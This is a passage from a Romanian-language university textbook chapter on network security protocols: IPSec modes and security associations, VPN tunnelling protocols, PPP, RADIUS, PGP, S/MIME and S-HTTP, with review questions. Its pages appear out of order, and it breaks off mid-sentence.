diverși algoritmi de criptare, uzuali fiind cei cu cheie publică (RSA, Diffie-Hellman, DES, 3DES
etc). Există două versiuni ale ISAKMP, IKEv1 și IKEv2 - Internet Key Exchange.

42
În funcție de tipul de încapsulare al traficului supus IPSec, suita poate realiza securizarea
prin încapsulare de tip tunel sau de tip transport.
Încapsularea de tip tunel (IP tunneling) apare în momentul în care entitățile participante la
IPSec sunt de tip gateway; ele au în administrare una sau mai multe subrețele pentru traficul cărora
realizează operații criptografice. Pachetul încapsulat IPSec va avea un set de adrese IP exterioare -
adresele IP ale entităților gateway și un set de adrese IP interioare sau protejate - adresele IP,
publice sau private, ale subrețelelor din spatele acestor gateway-uri. Antetul extern specifică
perechea de entități între care se creează tunelul IP și se aplică măsurile de securitate pe baza IPsec.
Antetul intern precizează destinația finală a pachetului pentru realizarea rutării. ESP protejează
numai pachetul transmis prin tunelul IP, în timp ce AH asigură și securitatea antetului exterior
atașat. De regulă acest mod de operare se utilizează între porți de securitate care execută
împachetarea și despachetarea mesajelor (gateway-to-gateway).
Încapsularea de tip transport (transport mode) apare în momentul în care entitățile
participante la IPSec sunt calculatoare independente, care au instalat un soft specializat IPSec,
realizând operații criptografice pentru propriul trafic. Pachetul încapsulat va avea un singur set de
adrese IP, publice, ale acestor calculatoare. Protocolul de securitate intervine în pachetul IP și
adaugă un antet de securitate imediat după antetul IP (cu sau fără opțiuni exprimate) dar antetul IP
inițial (header-ul) nu se modifică, doar datele transmise sunt securizate (criptate și/sau
autentificate).
Prin folosirea protocolului AH, adresele IP ale sursei, respectiv destinației, nu pot fi
modificate pe parcurs deoarece acest lucru ar duce la modificarea valorii hash. ESP oferă protecție
minimă protocoalelor de nivel superior, în timp ce AH securizează total pachetul, inclusiv antetul
IP. Acest mod de operare se utilizează pentru schimbul de pachete între calculatoarele-gazdă (host-
to-host).
Dacă la unul din capetele canalului de comunicație definit de SA, se găsește un echipament
de securitate (security gateway, firewall), atunci este obligatoriu ca acel SA să lucreze în modul de
tunelare pentru a evita problemele create de existența căilor multiple de rutare precum și pe cele
datorate fragmentării pachetelor.
Configurarea echipamentelor dintr-o rețea în vederea aplicării IPsec se realizează de către o
persoană cu drepturi depline de stabilire a securității rețelei (security officer), în trei etape:
1. crearea grupurilor de securitate (SA) și stabilirea drepturilor și atribuțiilor acestora;
2. configurarea legăturilor dintre SA-uri și stabilirea ierarhiilor de priorități, folosind
ISAKMP/IKE (RFC 2408, RFC 2409);
3. stabilirea modalităților de clasificare a pachetelor IP și de acțiune asupra lor (permite sau
interzice accesul în rețea, aplică procedurile de securitate conform IPsec).

43
Aceste configurații referitoare la IPsec sunt stocate în bazele de date pentru securitatea
rețelei (SPD - Security Policy Database), la care are acces doar administratorul de rețea. Regulile de
securitate aplicate într-o rețea folosind IPsec stabilesc trei moduri posibile de acțiune asupra
pachetelor IP:
1. se aplică pachetului serviciile de securitate conform IPsec;
2. se interzice accesul pachetului în rețea (deny);
3. se acordă permisiunea de acces în rețea, fără aplicarea măsurilor de securitate IP (bypass
IPsec).
Modul de acțiune asupra unui pachet IP se stabilește pe baza antetelor conținute de acesta,
prin operația de clasificare a pachetelor, în funcție de diverși factori de selecție, cum ar fi: adresa IP
a sursei, adresa IP a destinației, portul-sursă, portul-destinație, protocolul de transport, numele
utilizatorului sau al sistemului, gradul de prioritate a informațiilor conținute în pachet.
IPsec oferă posibilitatea unei comunicări sigure în rețelele de arie largă (WAN), în aplicații
precum:
 definirea rețelelor virtuale private, în care uzual IPsec este configurat să folosească
protocolul ESP în modul tunel pentru furnizarea confidențialității; pentru o organizație cu
mai multe rețele locale, aflate în diferite locații, traficul intern al rețelelor locale nu este
securizat, în timp ce traficul între acestea utilizează IPsec pentru securizare; IPsec este
activat în echipamentele de acces la rețeaua de arie largă, de exemplu în gateway, router sau
firewall; operațiile de criptare/decriptare și de autentificare executate de IPsec sunt
transparente pentru stațiile de lucru și serverele din rețelele locale;
 accesul securizat de la distanță prin rețeaua publică de Internet la un sistem în care este
implementat protocolul IPsec; se poate apela la un furnizor de Internet pentru a obține
accesul securizat la o rețea privată;
 îmbunătățirea securității aplicațiilor distribuite care au o serie de mecanisme de securitate
incluse; principala caracteristică a IPsec care îi permite să securizeze o gamă atât de largă de
aplicații distribuite (e-mail, transfer de fișiere, acces Web etc.), este faptul că pentru întregul
trafic IP se pot utiliza mecanismele de criptare și/sau autentificare.
Pentru o SA ca și identificatori avem un număr aleatoriu, denumit identificator de securitate
(SPI - Security Parameter Index), o adresă IP de destinație și un protocol de securitate (AH sau
ESP).
Identificatorul de securitate constă într-un sir de biți cu semnificație locală, inclus în
antetele AH și ESP pentru a permite destinației să selecteze SA-ul pentru procesarea pachetului
recepționat.

44
Adresa IP de destinație este adresa nodului de destinație al SA, care poate fi un calculator-
gazdă (host) sau un echipament de comunicație al rețelei (router, firewall, access point).
Identificatorul protocolului de securitate indică pentru care protocol, AH sau ESP, lucrează
SA. Dacă este necesară utilizarea ambelor protocoale de securitate în Internet (AH si ESP), atunci
se creează și se configurează legăturile dintre două sau mai multe SA.
Pentru ca în momentul securizării traficului fiecare entitate să cunoască parametrii de
securizare pentru fiecare tip de trafic este folosit identificatorul SPI - Security Parameter Index, un
index pe baza de date SAD. Folosind acest index și valoarea adresei IP din destinația pachetului ce
urmează a fi supus procesului de criptare sau autentificare, fiecare entitate IPSec știe exact ce
transformare trebuie realizată pe fiecare pachet IP pentru ca acesta să poată fi corect decriptat și
interpretat la receptor.
În momentul recepției unui pachet astfel securizat procesul de decriptare este asemănător cu
cel realizat la criptare. În cazul în care sunt mai mult de doi participanți la SA, în cazul traficului de
tip multicast, asocierea de securitate este furnizată pentru întregul grup și este prezentă pe fiecare
sistem participant. Pot exista, de asemenea, mai multe asocieri de securitate pentru un același grup
de entități, fiecare cu diverse nivele de securitate în interiorul grupului.
În funcție de al tipului entității participante la IPSec putem avea modelul de trafic:
 LAN-to-LAN sau site-to-site, în cazul în care entitățile sunt două gateway-uri de securitate
care realizează operații criptografice pentru subrețele protejate aflate în administrarea lor;
 Remote-Access sau Dial-Up VPN, în cazul în care entitățile sunt un gateway de securitate
care are în administrare o subrețea și un calculator independent care dorește să comunice cu
acea subrețea.
Această manieră de clasificare se pretează în exclusivitate tipului de încapsulare tunel,
neavând sens pentru tipul transport, în principal datorită faptului că un pachet trimis pe rețea are
două seturi de adrese IP: un set „extern”, reprezentat de adresele IP are calculatorului și al gateway-
ului căruia se adresează, și un set de adrese IP „intern”, reprezentat de adresa IP a unei mașini din
interiorul rețelei și a unei adrese IP noi a calculatorului, obținută de la acel gateway pentru a avea
adresabilitate de nivel IP în interiorul rețelei la care acest calculator se conectează. Procedeul prin
care un calculator obține, în momentul negocierii IPSec o adresă de la gateway pentru a avea acces
într-o rețea internă este numit mode-config în scenariile de tip IKEv1 sau configurare remote în cele
de IKEv2.
În momentul negocierii de IKE a parametrilor asocierii de securitate se realizează și faza de
autentificare mutuală sau unilaterală a entităților, existând mai multe modalități de a realiza această
autentificare:

45
 PSK - Pre-Shared Key: pentru autentificare, fiecare entitate are pre-configurată o cheie
secretă, o parolă; în momentul realizării negocierii IKE, entitățile trimit această cheie pe
rețea, spre a fi verificată de entitățile omoloage și verifică, la rândul lor, că o anumită
entitate-pereche are o anumită cheie secretă;
 PKI - Public Key Infrastructure: pentru autentificare este folosit un sistem de tip PKI;
fiecare entitate are un certificat digital semnat de o autoritate de certificare publică sau
internă a companiei, dar de încredere pentru toate entitățile participante în IPSec; în faza de
autentificare din IKE, fiecare entitate își trimite certificatul digital către omologi spre a fi
verificat și verifică la rândul ei validitatea acelui certificat digital;
 EAP - Extensible Authentication Protocol: la rândul său un framework, de data aceasta de
autentificare, EAP nu realizează însuși autentificarea, ci oferă o schemă de mesaje de
autentificare ce folosește metode specifice, cum sunt MD5, GTC, TLS, SIM, AKA; în faza
de autentificare, EAP este folosit ca extensie a protocolului IKEv2, acest framework nefiind
suportat în IKEv1.
Cele mai multe implementări de IPSec încearcă să realizeze pe cât posibil optimizarea
utilizării resurselor computaționale disponibile. Un exemplu în acest sens este închiderea tunelului
IPSec în cazul în care nu se mai trimit date pentru o anumită durată de timp, sau dacă lărgimea de
bandă ocupată pentru o anumită conexiune este nulă. Dacă aceasta este configurația implicită,
pentru anumite conexiuni se poate dori suprascrierea ei și menținerea acelei conexiuni. Una dintre
posibilitățile puse la dispoziție de standard se numește DPD - Dead Peer Detection. Acesta este un
mecanism de timp keepalive care presupune trimiterea unui pachet între capetele conexiunii, la un
interval stabilit.
Cu toate „măsurile de siguranță” luate în cazul IPSec, au fost raportate și unele
vulnerabilităţi în anumite configuraţii ale acestuia, acestea putând fi exploatate de atacatori pentru a
sustrage informaţii confidenţiale. Aceste atacuri sunt posibile când IPSec foloseşte ESP în modul de
funcţionare tunnel cu opţiunea confidentiality only, sau opţiunea integrity protection oferită de
modulul AH sau de un protocol de nivel mai ridicat. Dacă un atacator poate intercepta şi modifica
comunicaţiile IPSec și ICMP între două servere de tip security gateway, exploatând această
vulnerabilitate poate lansa atacuri de tip Destination Address Rewriting, IP Options modification şi
Protocol Field modification, astfel făcând posibilă sustragerea de informaţii din datele transferate
folosind IPsec. Ca și soluţie este recomandat să se configureze ESP astfel încât să folosească atât
opţiunea confidentiality, cât şi integrity protection și să se folosească protocolul AH alături de ESP
pentru a oferi protecţia integrităţii.

12.3.2. VPN

46
Noțiunea de rețea virtuală privată a fost dată în compartimentul precedent. În continuare
vom face cunoștință cu protocoalele, în baza cărora funcționează un VPN.
VPN-urile nu pot face conexiunile online complet anonime, dar de obicei pot spori nivelul
de confidențialitate și securitate. Pentru a împiedica scurgerea informațiilor private, rețelele VPN
permit în mod obișnuit doar acces autentificat la distanță, utilizând protocoale de tunelizare și
tehnici de criptare.
Modelul de securitate VPN oferă:
 confidențialitate, astfel încât, chiar dacă traficul de rețea este „ascultat” la nivelul
pachetelor, un atacator ar vedea numai date criptate;
 autentificarea expeditorului, pentru a împiedica accesul utilizatorilor neautorizați la VPN;
 integritatea mesajelor, pentru a detecta eventualele cazuri de manipulare a mesajelor
transmise.
Un tunel permite încapsularea unui pachet dintr-un tip de protocol în cadrul datagramei7
unui alt protocol. De exemplu, VPN utilizează PPTP pentru a încapsula pachetele IP printr-o rețea
publică, cum ar fi Internetul.
O soluție VPN poate fi configura în baza protocoalelor:
 Point-to-Point Tunneling Protocol (PPTP),
 Layer 2 Tunneling Protocol (L2TP),
 Secure Socket Tunneling Protocol (SSTP).
PPTP, L2TP și SSTP depind în mare măsură de caracteristicile specificate inițial pentru
protocolul Point-to-Point Protocol (PPP), care a fost proiectat pentru a trimite date prin conexiunea
dial-up sau conexiunea dedicată point-to-point. Pentru IP, PPP încapsulează pachetele IP în cadrul
frame-urilor PPP și apoi transmite pachetele PPP încapsulate prin intermediul unei legături point-to-
point. PPP a fost definit inițial ca protocolul care va fi utilizat între un client dial-up și un server de
acces la rețea.
Protocolul PPTP permite ca traficul multiprotocol să fie criptat și apoi încapsulat într-un
antet IP care să fie trimis într-o rețea IP sau într-o rețea IP publică, cum ar fi Internetul. PPTP poate
fi utilizat pentru conexiuni la distanță și conexiuni VPN site-to-site. Atunci când utilizează
Internetul ca rețea publică pentru VPN, serverul PPTP este un server VPN ce suportă PPTP cu o
interfață pe Internet și o a doua interfață pe intranet.
PPTP încapsulează frame-uri PPP în datagrame IP pentru transmisie pe rețea. PPTP
utilizează o conexiune TCP pentru gestionarea tunelurilor și o versiune modificată a Generic

7
Datagrama este un bloc de informații transmis de un protocol, fără a stabili mai întâi o conexiune și a crea un canal
virtual. Orice protocol care nu stabilește o pre-conexiune (și, de obicei, nu controlează ordinea de recepție, transmitere
și dublare a pachetelor) se numește datagram protocol. Așa sunt, de exemplu, protocoalele Ethernet, IP, UDP etc.
Numele „datagrama” a fost ales prin analogie cu cuvântul telegrama.
47
Routing Encapsulation (GRE) pentru a încapsula frame-uri PPP pentru datele tunelate. Conținutul
relevant (payload) al frame-urilor PPP încapsulate poate fi criptat, comprimat sau și una și alta.
Structura unui pachet PPTP care conține o datagramă IP este prezentată în figura 12.4.

Figura 12.4. Structura unui pachet PPTP care conține o datagramă IP

Frame-ul PPP este criptat cu Microsoft Point-to-Point Encryption (MPPE) utilizând chei de
criptare generate de procesul de autentificare MS-CHAP v2 sau EAP-TLS. Clienții de creare a rețelei
virtuale private trebuie să utilizeze protocolul de autentificare MS-CHAP v2 sau EAP-TLS, pentru
a putea cripta conținutul relevant al frame-urilor PPP. PPTP utilizează criptarea realizată de PPP și
doar încapsulează frame-ul PPP criptat anterior.
Protocolul L2TP permite ca traficul multiprotocol să fie criptat și apoi trimis prin orice mod
care suportă livrarea point-to-point a datagramei, cum ar fi protocolul IP sau modul de transfer
asincron (ATM8). L2TP este o combinație între PPTP și L2F9, o tehnologie dezvoltată de Cisco
Systems, Inc. L2TP reprezintă cele mai bune caracteristici ale PPTP și L2F.
Spre deosebire de PPTP, implementarea de către Microsoft a L2TP nu utilizează MPPE
pentru a cripta datagramele PPP. L2TP se bazează pe securitatea IPsec în modul Transport pentru
serviciile de criptare. Combinația dintre L2TP și IPsec este cunoscută sub numele de L2TP/IPsec.
Atât L2TP cât și IPsec trebuie să fie suportate atât de clientul VPN, cât și de serverul VPN.
L2TP este instalat cu protocolul TCP/IP.
Încapsularea pentru pachetele L2TP/IPsec constă din două nivele: încapsularea L2TP și
încapsularea IPSsec.
La încapsularea L2TP, un frame PPP (o datagramă IP) este înfășurat cu un antet L2TP și un
antet UDP (figura 12.5).

8
Mod de transfer asincron (ATM - Asynchronous Transfer Mode) este un protocol de comutație temporală asincronă,
de mare viteză, orientată pe conexiune și bazată pe circuite virtuale, folosită în transportul traficului de rețea. ATM
împachetează informațiile în celule de lungime fixă a câte 53 de octeți, care pot fi interschimbate rapid de conexiunile
logice dintr-o rețea informatică.
9
L2F sau Layer 2 Forwarding este un protocol de tunel dezvoltat de Cisco Systems, Inc. pentru a stabili conexiuni de
rețea privată virtuală prin Internet. L2F nu oferă de la sine criptarea sau confidențialitatea și se bazează pe protocolul de
tunel care asigură confidențialitatea. L2F a fost proiectat anume pentru a realiza tuneluri de tip PPP.
48
Figura 12.5. Structura unui pachet L2TP care conține o datagramă IP

La încapsularea IPsec mesajul L2TP obținut este apoi înfășurat cu IPsec Encapsulating
Security Payload (ESP) header și trailer, un IPsec Authentication trailer care asigură integritatea și
autentificarea mesajelor și un header IP final. În header-ul IP sunt adresele IP sursă și destinație
care corespund clientului VPN și serverului VPN (figura 12.6).
Criptarea. Mesajul L2TP este criptat, utilizând chei de criptare generate de procesul de
negociere Internet Key Exchange (IKE).

Figura 12.6. Încapsularea L2TP și IPsec pentru o datagramă PPP

Protocolul SSTP este un protocol de tunelare care utilizează protocolul HTTPS prin portul
TCP 443 pentru a trece traficul prin firewall-uri și proxy-uri web care ar putea bloca traficul PPTP
și L2TP/IPsec. SSTP oferă un mecanism de încapsulare a traficului PPP pe canalul TLS al
protocolului HTTPS. Utilizarea PPP oferă suport pentru metode puternice de autentificare, cum ar fi
EAP-TLS. SSL asigură securitatea la nivelul Transport prin negocierea cheii, criptare și verificarea
integrității.
Atunci când un client încearcă să stabilească o conexiune VPN bazată pe SSTP, protocolul
stabilește mai întâi un nivel HTTPS bidirecțional cu serverul SSTP. Prin intermediul acestui nivel
HTTPS, pachetele de protocoale se transmit ca payload.
Încapsularea. SSTP încapsulează frame-uri PPP în datagrame IP pentru a fi transmisie prin
rețea. SSTP utilizează o conexiune TCP (prin portul 443) pentru gestionarea tunelurilor, precum și a
frame-urilor de date PPP.
Criptarea. Mesajul SSTP este criptat cu canalul TLS al protocolului HTTPS.
Pe scurt, mecanismul de funcționare al protocolului SSTP este următorul (figura 12.7):

49
1. este stabilită conexiunea TCP de la client la server (implicit pe portul 443);
2. SSL validează certificatul serverului; dacă certificatul este valid, conexiunea este
stabilită, altfel conexiunea este întreruptă;
3. clientul trimite pachete de control SSTP prin sesiunea HTTPS, care stabilește starea
SSTP pe ambele părți;
4. negocierea PPP asupra SSTP; clientul se autentifică pe server și leagă adresele IP de
interfața SSTP;
5. tunelul SSTP este acum stabilit și încapsularea pachetelor poate începe.

Figura 12.7. Mecanismul de funcționare al protocolului SSTP

Protocoalele PPTP, L2TP și SSTP stau la baza VPN realizate în IPsec, Datagram Transport
Layer Security (DTLS), utilizat în Cisco AnyConnect VPN și în OpenConnect VPN, Microsoft
Point-to-Point Encryption (MPPE), Microsoft Secure Socket Tunneling Protocol (SSTP), Multi
Path Virtual Private Network (MPVPN, Secure Shell (SSH) VPN și altele.

12.4. Protocoale la Nivelul Legătură de Date


La nivelul Data Link Layer de asemenea sunt câteva protocoale, printre care: PPP, RADIUS
și TACAS+.

12.4.1. Protocolul PPP


Point-to-Point Protocol (PPP) este un protocol de comunicație folosit pentru a stabili o
conexiune directă între două noduri. El conectează direct două routere fără nici un host sau alt
dispozitiv de rețea între ele. PPP poate asigura autentificarea conectării, criptarea transmisiei
(folosind ECP, RFC 1968) și compresia.
Protocolul Point-to-Point constă din trei componente principale:
 o metodă de încapsulare a datagramelor prin serial link;
 protocolul LCP (Link Control Protocol) pentru stabilirea, configurarea și testarea
conexiunii legăturii de date;
 o familie de protocoale de control al rețelei NCP (Network Control Protocols) pentru
stabilirea și configurarea diferitor protocoale de nivel de rețea.

50
12.4.2. RADIUS
Remote Authentication Dial In User Service (RADIUS) este un protocol standard de
Internet care furnizează autentificare centralizată, contabilizare şi servicii de gestiune a IP-urilor
pentru utilizatorii de acces la distanţă într-o reţea dial-up distribuită (deseori se utilizează acronimul
AAA - Authentication, Authorization, Accounting – pentru aceste trei servicii).
Modelul client-server RADIUS are un NAS (Network Access Server - Server de acces la
reţea) care operează drept client al unui server RADIUS. Sistemul, acţionând ca NAS-ul, trimite
informaţiile de conexiune şi utilizator la un server RADIUS desemnat utilizând protocolul standard
RADIUS definit în RFC 2865 (figura 12.8).

Figura 12.8. Autentificarea și autorizarea printr-un server RADIUS

Serverele RADIUS acţionează la cererile de conexiune ale utilizator autentificând


utilizatorul şi apoi returnează toate informaţiile de configurare necesare la NAS, astfel încât NAS
(sistemul) să poată livra servicii autorizate la utilizatorul de apel de intrare autentificat. Dacă nu se
poate ajunge la un server RADIUS, sistemul poate ruta cererile de autentificare la un server
alternativ. Aceasta permite întreprinderilor globale să le ofere utilizatorilor lor un serviciu de apel
de intrare cu un ID unic de logare a utilizatorului pentru acces la nivelul corporaţiei, indiferent de
punctul de acces care este utilizat.
Când se primeşte o cerere de autentificare de către serverul RADIUS, cererea este validată;
apoi serverul RADIUS decriptează pachetul de date pentru a accesa informaţiile de parolă şi nume
de utilizator. Informaţiile sunt transmise la sistemul de securitate corespunzător. Acestea pot fi
fişierele de parolă UNIX, Kerberos, un sistem de securitate comercial sau chiar un sistem de
securitate dezvoltat de client. Serverul RADIUS trimite înapoi la sistem toate serviciile pe care
utilizatorul autentificat este autorizat să le utilizeze, cum ar fi o adresă IP. Cererile de contabilizare
RADIUS sunt tratate de o manieră similară (figura 12.9). Informaţiile de contorizare ale
utilizatorului la distanţă pot fi trimise unui server de contorizare RADIUS desemnat. Protocolul
standard de contabilizare RADIUS este definit în RFC 2866. Serverul de contorizare RADIUS
acţionează asupra cererilor de contorizare prin înregistrarea informaţiilor din cererea de contorizare
RADIUS.

51
Figura 12.9. Contabilizarea printr-un server RADIUS

Din protocolul RADIUS a fost derivat protocolul DIAMETER, el având multe îmbunătățiri
în diverse aspecte și este, în general, considerat a fi protocolul de autentificare, autorizare și
contabilizare (AAA) de următoarea generație, el fiind un protocol la nivelul aplicație.

12.5. Întrebări și subiecte pentru aprofundarea cunoștințelor și lucrul individual


1. Explicați la general principiul de funcționare al protocolului PGP?
2. Care sunt avantajele aplicării protocolului https în mediul WWW? Descrieți schema
generală de funcționare a acestui protocol.
3. Descrieți cum se realizează comunicarea dintre client și server cu ajutorul
protocolului SSL/TLS. Justificați necesitatea de înlocuire a protocolului SSL cu
TLS.
4. Descrieți serviciile de securitate pe nivelul IP al rețelelor TCP/IP realizate de
protocolul IPSec.
5. Cum se realizează autentificarea prin intermediul IPSec?
6. Descrieți, în baza unui protocol criptografic, principul de funcționare a unei rețele
virtuale private.

52
TEMA 12: PROTOCOALE DE SECURITATE ÎN REȚEA

Obiectivele temei:
 Analiza protocoalelor la Nivelul Aplicație.
 Analiza protocoalelor la Transport.
 Analiza protocoalelor la Nivelul Rețea.
 Analiza protocoalelor la Nivelul Legătură de Date.

Cuvinte-cheie:
PGP, SET, VPN,
S/MIME, KERBEROS, PPP,
S-HTTP, TLS/SSL, RADIUS
HTTPS, IPSec,

Protocoale de rețea de bază IP, TCP, UDP, BGP, DNS nu mai pot asigura nivelul necesar de
securitate, fiind pasibile diverselor atacuri, iar cerința și aspirația de asigurare a securității și a
caracterului privat al informației au condus la elaborarea și implementarea mai multor protocoale și
standarde de securitate, printre care se numără: protocoalele Secure Socket Layer (SSL) și Secure
Transport Layer (TLS), Internet Protocol Security (IPSec), Secure HTTP (S-HTTP), protocoale de
securitate pentru e-mail (PGP și S / MIME), DNDSEC, SSH și altele. Aceste protocoale au ca
obiectiv asigurarea securității informației pe întreaga stivă a protocolului TCP/IP.

12.1. Protocoale la Nivelul Aplicație


Securitatea Nivelului Aplicație este asigurată de mai multe protocoale, printre care se
numără PGP, S/MIME, S-HTTP, HTTPS, SET, KERBEROS.

12.1.1. PGP
Cerințele de securitate în poșta electronică au condus la realizarea mai multor pachete de
programe destinate protecției criptografice a scrisorilor trimise prin rețele. Dintre acestea, cel mai
popular este PGP (Pretty Good Privacy) dezvoltat de Philip Zimmermann în SUA. Acest pachet de
programe a stârnit serioase controverse, datorită răspândirii sale pe Internet și a folosirii lui în toată
lumea, fără să se respecte drepturile de licență și de export, destul de rigide în privința algoritmilor
criptografici. Zimmerman a fost anchetat, în 1994, de o comisie federală, pentru acuzația de
nerespectare a legilor americane privind exportul de sisteme criptografice. FBI l-a învinuit pe
Zimmerman de punerea pe Internet a PGP-ului, în arhive publice, ceea ce a condus la o răspândire
necontrolabilă a utilizării sale. PGP-ul este folosit astăzi de diverse categorii de utilizatori, de la
simpli studenți și particulari pană la organizații naționale, internaționale și agenții guvernamentale.
PGP este un pachet de programe destinat protecției poștei electronice și a fișierelor, prin
cifrare clasică și cu chei publice. Cu ajutorul său se pot stabili modalități sigure de comunicație între
persoane, nefiind necesară schimbarea prealabilă a unor chei de cifrare. PGP include un sistem sigur
de gestiune a cheilor, autentificarea datelor prin semnătură digitală și compresia datelor. El
funcționează pe diferite platforme, inclusiv MS-DOS, UNIX, VAX/VMS și altele.
PGP satisface trei cerințe fundamentale: caracterul privat al poștei electronice, autentificarea
emițătorului și autentificarea mesajelor. Aceste cerințe sunt realizate prin:
 criptarea fișierelor - poate fi folosit pentru a cripta fișiere proprii, folosind unul dintre
algoritmii de criptare cu cheie secretă AES, CAST5, 3DES, IDEA, Twofish, Blowfish,
Camellia; după criptare, fișierul poate fi decriptat doar de cineva care cunoaște parola de
criptare a fișierului;
 crearea de chei secrete si publice - aceste chei sunt necesare pentru a cripta și semna
mesajele transmise sau pentru a decripta mesajele primite;
 gestionarea cheilor - PGP-ul poate fi folosit pentru a crea și întreține o bază de date care să
conțină cheile publice ale persoanelor cu care vrem să corespondăm;
 transmiterea și recepționarea de mesaje e-mail criptate - cu ajutorul PGP-ului se pot trimite
scrisori criptate și decripta scrisorile primite;
 folosirea semnăturilor digitale - PGP-ul poate face o semnătură electronică a documentelor
sau poate verifica semnătura oricărei persoane, folosind algoritmul RSA sau ELGAmal și
una din funcțiile hash MD5, SHA-1, RIPEMD-160, SHA-256, SHA-384, SHA-512;
 certificarea cheilor - PGP-ul o asigură prin semnarea electronică a cheilor publice;
 revocarea, dezactivarea și custodia cheilor: dacă cheile sunt compromise, acestea pot fi
revocate sau dezactivate; acestea pot fi ținute la loc sigur, folosind facilitățile de custodie;
 configurarea după necesități a PGP-ului - setările variabilelor din fișierul de configurare a
PGP-ului pot fi schimbate;
 folosirea serverelor de chei PGP de pe Internet – există posibilitatea de a adăuga o cheie
publică la o bază de date server sau de a obține alte chei publice care se află pe server.
Securitatea mesajelor în PGP este asigurată de criptografia cu cheie privată, numită de PGP
criptografie convențională. PGP-ul nu reclamă un schimb prealabil de chei între utilizatori. El
folosește o combinație a sistemului criptografic simetric și cu chei publice: sistemul simetric este
utilizat pentru cifrarea conținutului scrisorilor sau fișierelor, iar sistemul asimetric RSA - pentru
protecția și distribuția cheii K de unică întrebuințare (numită și cheie de sesiune) cu care se face
cifrarea simetrică a scrisorii, precum și pentru autentificarea prin semnătură digitală a mesajului și a
emițătorului.

2
La emisia unei scrisori, atunci când sunt folosite atât serviciile de confidențialitate cât și de
autenticitate, PGP execută următoarele prelucrări:
 folosindu-se un algoritmul de hash, se creează un cod de autentificare MAC (Message
Authentication Code):
MAC = MD5 (Mesaj);
 prin cifrarea cu cheia secretă SKA a emițătorului A al scrisorii, folosindu-se algoritmul RSA,
se creează semnătura digitală pentru autentificarea mesajului și a originii sale:
S = RSA (MAC, SKA);
 scrisoarea este comprimată, utilizând unul din algoritmii ZIP, ZLIB, BZIP2. Acest lucru
asigură o reducere a volumului de date ce trebuie cifrate și apoi transmise:
Mesaj-comprimat = zip (Mesaj);
 se generează pseudoaleator o cheie de cifrare K (folosită doar pentru acest mesaj), numită
cheie de sesiune:
K= random();
 mesajul comprimat anterior este apoi cifrat cu ajutorul unuia dintre algoritmii simetrici
incluși în protocol, folosindu-se cheia generată în pasul precedent:
mesaj-cifrat = EK(Mesaj-comprimat);
 folosind RSA cu cheia publică PKB a destinatarului B al scrisorii, se pune în anvelopă cheia
de sesiune pentru a putea fi trimisă în mod sigur la receptor. Acest lucru înseamnă cifrarea
cheii de sesiune cu cheia publică a destinatarului:
Cheie-sesiune-anvelopată = RSA (Cheie-sesiune, PKB);
 se creează scrisoarea protejată, în vederea transmiterii ei la destinație, folosind servicii
obișnuite de e-mail:
scrisoare-protejată = [Key-ID, S, Data-semnătură, Cheie-sesiune-anvelopată, Mesaj-cifrat]

12.1.2. S/MIME
S/MIME (Secure Multi-Purpose Internet Mail Extensions) este o altă metodă sigură de
trimitere a mesajelor e-mail care utilizează sistemul de criptare RSA. S/MIME este inclus în cele
mai recente versiuni ale browserelor Web de la Microsoft și Netscape și a fost, de asemenea,
aprobat de alți furnizori care fac produse de mesagerie. RSA a propus S/MIME ca standard pentru
Internet Engineering Task Force (IETF).
MIME în sine, descrisă în standardul IETF numit Request for Comments (RFC) 1521,
precizează modul în care va fi organizat un mesaj electronic. S/MIME descrie modul în care
informația ce trebuie criptară și certificatul digital pot fi incluse ca parte a corpului mesajului.
S/MIME urmărește sintaxa furnizată în formatul #7 al standardului criptografiei cu cheie publică
descris în RFC 2315.
3
Utilizarea corectă a standardului S/MIME impune însă anumite restricții asupra utilizării
aplicațiilor tradiționale de e-mail și a mediului de lucru în care sunt utilizate:
 expeditorul și destinatarul trebuie să convină asupra utilizării aplicațiilor de e-mail client
care acceptă acest standard; în caz contrar, clientul de e-mail al destinatarului afișează în
scrisori fișierele-atașamente „smime.p7s”, pe care destinatarul, în mod normal, nu le
poate interpreta corect;
 utilizarea eficientă a S/MIME necesită o abordare integrată a securității; aceasta
înseamnă că este necesar ca mesajele să fie protejate nu numai de-a lungul căii de la
expeditor la destinatar, ci și în mediul de lucru al expeditorului și al destinatarului; în
special, nerespectarea acestei cerințe poate duce la scurgerea informațiilor confidențiale
sau la modificarea neautorizată a mesajelor, precum și la compromiterea cheilor secrete
direct pe computerele utilizatorilor;
 S/MIME este, în principiu, incompatibilă cu serviciul de e-mail; acest lucru se datorează
faptului că criptografia cu chei publice, care stă la baza standardului S/MIME, protejează
confidențialitatea și integritatea mesajelor în drumul de la expeditor spre destinatar; în
același timp, confidențialitatea și integritatea mesajelor sunt inaccesibile în utilizarea
tradițională a mesajelor Web, deoarece furnizorul de servicii de e-mail are capacitatea de
a citi mesajele și de a le modifica; în același timp, încercările de a utiliza semnarea sau
criptarea mesajelor pe partea de server reprezintă o compromitere a cheilor secrete ale
utilizatorului; în plus, principalul avantaj al serviciului de e-mail - disponibilitatea
acestuia de pe orice computer în care există un browser web - este contrar cerinței de a
controla securitatea mediului de lucru atunci când se utilizează S/MIME.

12.1.3. S-HTTP
Protocolul nativ pe care clienții și serverele World Wide Web le utilizează pentru a
comunica este HTTP (Hypertext Transfer Protocol). HTTP este ideal pentru comunicații deschise,
dar nu oferă caracteristici de autentificare și criptare. S-HTTP a fost dezvoltat pentru a funcționa
împreună cu HTTP pentru a permite clienților și serverelor să se angajeze în tranzacții private și
sigure. S-HTTP este util în special pentru criptarea informațiilor bazate pe formulare pe măsură ce
acestea trec între clienți și servere, criptarea fiind realizat[ numai la mesaje de nivel HTTP.
S-HTTP nu a fost niciodată pe deplin acceptat de furnizorii de browsere web, cum ar fi
Microsoft și Netscape, totuși, S-HTTP este suportat de un șir de astfel de produse. Aceasta suportă
o varietate de algoritmi criptografici și regimuri de lucru. Mesajele pot fi protejate prin utilizarea
semnăturilor digitale, autentificării și criptării. La primul contact, expeditorul și receptorul stabilesc
preferințele pentru criptare și manipulare a mesajelor securizate.

4
Pot fi utilizate un șir de algoritmi de criptare și tehnici de securitate, inclusiv criptarea DES
și RC2 sau semnarea cheilor publice RSA. În plus, utilizatorii pot alege să utilizeze un anumit tip de
certificat sau niciun certificat. În cazurile în care certificatele de cheie publică nu sunt disponibile,
este posibil ca expeditorul și receptorul să utilizeze o cheie de sesiune pe care au convenit-o în
prealabil. Este disponibil de asemenea și un mecanism challenge/response.

12.1.4. HTTPS
HTTPS (Secure Hyper Text Transfer Protocol) este un protocol de comunicație destinat
